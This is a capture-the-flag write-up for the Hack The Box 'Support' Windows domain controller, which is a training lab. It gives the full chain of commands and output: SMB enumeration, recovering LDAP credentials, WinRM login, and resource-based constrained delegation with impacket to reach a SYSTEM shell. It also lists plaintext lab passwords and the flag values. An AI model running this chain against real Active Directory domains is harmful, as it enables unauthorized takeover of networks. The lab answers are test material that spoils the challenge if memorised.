HTB Support done
Support
OS:
Windows
Technology:
LDAP
AD
IP Address:
10.10.11.174
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 09:29:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49755/tcp open msrpc Microsoft Windows RPC
53813/tcp open msrpc Microsoft Windows RPC
Users and pass:
After debugging app UserInfo.exe
L: support
P: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E (encoded)
P: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (decrypted)
---
After LDAP dump all records we see password
L: support
P: Ironside47pleasure40Watchful
---
After LDAP I found a new usernames:
anderson.damian
bardot.mary
cromwell.gerard
daughtler.mabel
ford.victoria
hernandez.stanley
langley.lucy
levine.leopoldo
monroe.david
raven.clifton
smith.rosario
stoll.rachelle
thomas.raphael
west.laura
wilson.shelby
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.174_nmap 10.10.11.174 ; cat 10.10.11.174_nmap.nmap | grep "tcp.*open"
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 11:25 CEST
Nmap scan report for 10.10.11.174
Host is up (0.038s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-03 09:29:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49755/tcp open msrpc Microsoft Windows RPC
53813/tcp open msrpc Microsoft Windows RPC
SMB - download files
List all shares
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ smbclient -U anonymous -N -L //10.10.11.174
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
└─$ smbclient -U anonymous -N '//10.10.11.174/support-tools'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 19:01:06 2022
.. D 0 Sat May 28 13:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 13:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 13:19:55 2022
putty.exe A 1273576 Sat May 28 13:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 13:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 19:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 13:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 13:19:43 2022
4026367 blocks of size 4096. 970943 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \7-ZipPortable_21.07.paf.exe of size 2880728 as 7-ZipPortable_21.07.paf.exe (879.4 KiloBytes/sec) (average 879.4 KiloBytes/sec)
getting file \npp.8.4.1.portable.x64.zip of size 5439245 as npp.8.4.1.portable.x64.zip (1891.0 KiloBytes/sec) (average 1352.4 KiloBytes/sec)
getting file \putty.exe of size 1273576 as putty.exe (1732.2 KiloBytes/sec) (average 1392.9 KiloBytes/sec)
getting file \SysinternalsSuite.zip of size 48102161 as SysinternalsSuite.zip (1659.6 KiloBytes/sec) (average 1608.4 KiloBytes/sec)
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (599.5 KiloBytes/sec) (average 1595.5 KiloBytes/sec)
getting file \windirstat1_1_2_setup.exe of size 79171 as windirstat1_1_2_setup.exe (351.4 KiloBytes/sec) (average 1587.9 KiloBytes/sec)
getting file \WiresharkPortable64_3.6.5.paf.exe of size 44398000 as WiresharkPortable64_3.6.5.paf.exe (1227.4 KiloBytes/sec) (average 1408.6 KiloBytes/sec)
smb: \> exit
Unpack file: UserInfo.exe
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/smb]
└─$ dir
7-ZipPortable_21.07.paf.exe npp.8.4.1.portable.x64.zip putty.exe SysinternalsSuite.zip UserInfo.exe.zip windirstat1_1_2_setup.exe WiresharkPortable64_3.6.5.paf.exe
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/smb]
└─$ unzip UserInfo.exe.zip -d UserInfo
Archive: UserInfo.exe.zip
inflating: UserInfo/UserInfo.exe
inflating: UserInfo/CommandLineParser.dll
inflating: UserInfo/Microsoft.Bcl.AsyncInterfaces.dll
inflating: UserInfo/Microsoft.Extensions.DependencyInjection.Abstractions.dll
inflating: UserInfo/Microsoft.Extensions.DependencyInjection.dll
inflating: UserInfo/Microsoft.Extensions.Logging.Abstractions.dll
inflating: UserInfo/System.Buffers.dll
inflating: UserInfo/System.Memory.dll
inflating: UserInfo/System.Numerics.Vectors.dll
inflating: UserInfo/System.Runtime.CompilerServices.Unsafe.dll
inflating: UserInfo/System.Threading.Tasks.Extensions.dll
inflating: UserInfo/UserInfo.exe.config
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/smb]
└─$ cd UserInfo
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Support/smb/UserInfo]
└─$ ls
CommandLineParser.dll Microsoft.Extensions.DependencyInjection.Abstractions.dll Microsoft.Extensions.Logging.Abstractions.dll System.Memory.dll System.Runtime.CompilerServices.Unsafe.dll UserInfo.exe
Microsoft.Bcl.AsyncInterfaces.dll Microsoft.Extensions.DependencyInjection.dll System.Buffers.dll System.Numerics.Vectors.dll System.Threading.Tasks.Extensions.dll UserInfo.exe.config
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Support/smb/UserInfo]
Debug file UserInfo.exe
We found info about username support use LDAP and use password:
L: support
P: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E (encoded)
We have to decrypt password use function getPassword
P: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (decrypted)
Dump all info via LDAP
[389, 636, 3268, 3269 - Pentesting LDAP - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)
---
We found password (it is look like password)
___
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/dnSpy]
└─$ ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | tee 10.10.11.174_ldapsearch
# extended LDIF
#
# LDAPv3
# base <CN=Users,DC=support,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# Users, support.htb
dn: CN=Users,DC=support,DC=htb
objectClass: top
objectClass: container
cn: Users
description: Default container for upgraded user accounts
distinguishedName: CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528110155.0Z
whenChanged: 20220528110155.0Z
uSNCreated: 5660
uSNChanged: 5660
showInAdvancedViewOnly: FALSE
name: Users
objectGUID:: fvT3rPs5nUaComz/MQQwrw==
systemFlags: -1946157056
objectCategory: CN=Container,CN=Schema,CN=Configuration,DC=support,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20220528110344.0Z
dSCorePropagationData: 16010101000001.0Z
...
...
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
Find a new username from LDAP
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ cat 10.10.11.174_ldapsearch| grep -oE "CN.*Users" | awk -F'=' '{print $2}' | grep "\." | awk -F "," '{print $1}' | sort | uniq
anderson.damian
bardot.mary
cromwell.gerard
daughtler.mabel
ford.victoria
hernandez.stanley
langley.lucy
levine.leopoldo
monroe.david
raven.clifton
smith.rosario
stoll.rachelle
thomas.raphael
west.laura
wilson.shelby
Login to remote host as user support
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=============== =============================================
support\support S-1-5-21-1677581083-3380853377-188903654-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts Group S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Read flag: user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> dir
Directory: C:\Users\support\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/3/2024 2:15 AM 34 user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
2fbbc52f17ae6138da4a05d4cb5390e3
*Evil-WinRM* PS C:\Users\support\Desktop>
Download BloodHound
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ git clone https://github.com/dirkjanm/BloodHound.py.git
Cloning into 'BloodHound.py'...
remote: Enumerating objects: 1518, done.
remote: Counting objects: 100% (613/613), done.
remote: Compressing objects: 100% (101/101), done.
remote: Total 1518 (delta 545), reused 554 (delta 512), pack-reused 905
Receiving objects: 100% (1518/1518), 538.52 KiB | 799.00 KiB/s, done.
Resolving deltas: 100% (1045/1045), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ cd BloodHound.py
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ ls
bloodhound bloodhound.py createforestcache.py Dockerfile LICENSE README.md setup.py
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
Run BloodHound (remote)
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ python3 bloodhound.py -d support.htb -dc support.htb -c All -ns 10.10.11.174 --zip -u support -p Ironside47pleasure40Watchful
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: support.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: support.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 09S
INFO: Compressing output into 20240403125732_bloodhound.zip
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ ls
20240403125732_bloodhound.zip bloodhound.py Dockerfile README.md
bloodhound createforestcache.py LICENSE setup.py
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ mv 20240403125732_bloodhound.zip ../
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Support/BloodHound.py]
└─$ cd ../
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ unzip 20240403125732_bloodhound.zip -d 10.10.11.174_bloodhound
Archive: 20240403125732_bloodhound.zip
extracting: 10.10.11.174_bloodhound/20240403125732_users.json
extracting: 10.10.11.174_bloodhound/20240403125732_groups.json
extracting: 10.10.11.174_bloodhound/20240403125732_gpos.json
extracting: 10.10.11.174_bloodhound/20240403125732_ous.json
extracting: 10.10.11.174_bloodhound/20240403125732_containers.json
extracting: 10.10.11.174_bloodhound/20240403125732_domains.json
extracting: 10.10.11.174_bloodhound/20240403125732_computers.json
Analysis of the results from Bloodhound
We see that we have privilege "GenericAll" this means that we have gull rights to all object in AD.
Privilege Escalation
Add a new computer to AD
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ impacket-addcomputer -computer-name 'hackcomp$' -computer-pass qwerty123 -dc-ip 10.10.11.174 support/support:Ironside47pleasure40Watchful
Impacket v0.11.0 - Copyright 2023 Fortra
[!] No DC host set and 'support' doesn't look like a FQDN. DNS resolution of short names will probably fail.
[*] Successfully added machine account hackcomp$ with password qwerty123.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
Add releated security description to computer (msDS-AllowedToActOnBehalfOfOtherIdentity)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ wget https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py ; file rbcd.py
--2024-04-03 14:15:20-- https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3470 (3.4K) [text/plain]
Saving to: ‘rbcd.py’
rbcd.py 100%[==============================================>] 3.39K --.-KB/s in 0.002s
2024-04-03 14:15:20 (1.61 MB/s) - ‘rbcd.py’ saved [3470/3470]
rbcd.py: Python script, ASCII text executable
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ python3 rbcd.py -f hackcomp -t DC -dc-ip 10.10.11.174 support\\support:Ironside47pleasure40Watchful
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Starting Resource Based Constrained Delegation Attack against DC$
[*] Initializing LDAP connection to 10.10.11.174
[*] Using support\support account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Writing SECURITY_DESCRIPTOR related to (fake) computer `hackcomp` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `DC`
[*] Delegation rights modified succesfully!
[*] hackcomp$ can now impersonate users on DC$ via S4U2Proxy
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
Impersonated Service Ticket for the target
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ impacket-getST -spn cifs/DC.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support/hackcomp$:qwerty123
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Update the KRB5CCNAME environment variable and add FQDN DC to hosts file
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ export KRB5CCNAME=`pwd`/Administrator.ccache
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ klist
Ticket cache: FILE:/mnt/oscp/writeups/HTB/HTB_Support/Administrator.ccache
Default principal: Administrator@support
Valid starting Expires Service principal
04/03/2024 14:21:44 04/04/2024 00:21:43 cifs/[email protected]
renew until 04/04/2024 14:21:42
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ cat /etc/hosts | grep support
10.10.11.174 support.htb DC.support.htb
Run impacket-psexec to gain a SYSTEM shell
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Support]
└─$ impacket-psexec -k DC.support.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on DC.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WJsmliRU.exe
[*] Opening SVCManager on DC.support.htb.....
[*] Creating service ifus on DC.support.htb.....
[*] Starting service ifus.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Read flag: root.txt
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 955A-5CBB
Directory of C:\Users\Administrator\Desktop
05/28/2022 04:17 AM <DIR> .
05/28/2022 04:11 AM <DIR> ..
04/03/2024 02:15 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,969,761,280 bytes free
C:\Users\Administrator\Desktop> type root.txt
01c236f2cbb94dd47d6d8a743d068d5c
C:\Users\Administrator\Desktop>
References
[389, 636, 3268, 3269 - Pentesting LDAP - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)
[Kerberos Resource-based Constrained Delegation: Computer Object Takeover](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution)
[Rbcd-Attack - Kerberos Resource-Based Constrained Delegation Attack From Outside Using Impacket]( https://hakin9.org/rbcd-attack-kerberos-resource-based-constrained-delegation-attack-from-outside-using-impacket/)
[Abusing Kerberos Resource-Based Constrained Delegation](https://github.com/tothi/rbcd-attack/blob/master/rbcd.py)
Lessons Learned